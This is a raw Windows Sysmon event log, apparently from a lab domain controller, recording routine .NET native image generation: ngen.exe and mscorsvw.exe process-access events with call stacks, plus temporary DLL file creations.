13:24:32.520{08A6967A-44E3-6000-3401-000000009A01}7284492C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-4610-6000-5703-000000009A01}1636C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000007495Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 13:24:32.442{08A6967A-460F-6000-5603-000000009A01}2816C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\b00-0\System.DirectoryServices.dll2021-01-14 13:24:32.442 10341000x80000000000000007508Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:24:33.458{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4611-6000-5A03-000000009A01}4156C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007507Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:24:33.442{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-4611-6000-5A03-000000009A01}4156C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007506Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:24:33.442{08A6967A-44E3-6000-3401-000000009A01}7284996C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-4611-6000-5A03-000000009A01}4156C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000007505Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:24:33.020{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4611-6000-5903-000000009A01}2832C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007504Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:24:33.005{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-4611-6000-5903-000000009A01}2832C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007503Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:24:33.005{08A6967A-44E3-6000-3401-000000009A01}7284492C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-4611-6000-5903-000000009A01}2832C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000007522Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:24:34.911{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4612-6000-5E03-000000009A01}5004C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007521Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:24:34.895{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-4612-6000-5E03-000000009A01}5004C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007520Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:24:34.895{08A6967A-44E3-6000-3401-000000009A01}7284996C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-4612-6000-5E03-000000009A01}5004C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000007519Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:24:34.786{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4612-6000-5D03-000000009A01}5060C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007518Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:24:34.770{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-4612-6000-5D03-000000009A01}5060C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007517Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:24:34.770{08A6967A-44E3-6000-3401-000000009A01}7284492C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-4612-6000-5D03-000000009A01}5060C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000007516Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 13:24:34.708{08A6967A-4612-6000-5C03-000000009A01}1272C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\4f8-0\CustomMarshalers.dll2021-01-14 13:24:34.708 10341000x80000000000000007515Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:24:34.630{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4612-6000-5C03-000000009A01}1272C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007514Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:24:34.614{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-4612-6000-5C03-000000009A01}1272C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007513Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:24:34.614{08A6967A-44E3-6000-3401-000000009A01}7284996C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-4612-6000-5C03-000000009A01}1272C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000007512Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:24:34.583{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4612-6000-5B03-000000009A01}5024C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007511Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:24:34.567{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-4612-6000-5B03-000000009A01}5024C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007510Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:24:34.567{08A6967A-44E3-6000-3401-000000009A01}7284492C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-4612-6000-5B03-000000009A01}5024C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000007509Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 13:24:34.474{08A6967A-4611-6000-5A03-000000009A01}4156C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\103c-0\System.Web.Services.dll2021-01-14 13:24:34.474 10341000x80000000000000007529Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:24:35.286{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4613-6000-6003-000000009A01}3292C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007528Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:24:35.270{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-4613-6000-6003-000000009A01}3292C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007527Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:24:35.270{08A6967A-44E3-6000-3401-000000009A01}7284996C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-4613-6000-6003-000000009A01}3292C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000007526Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 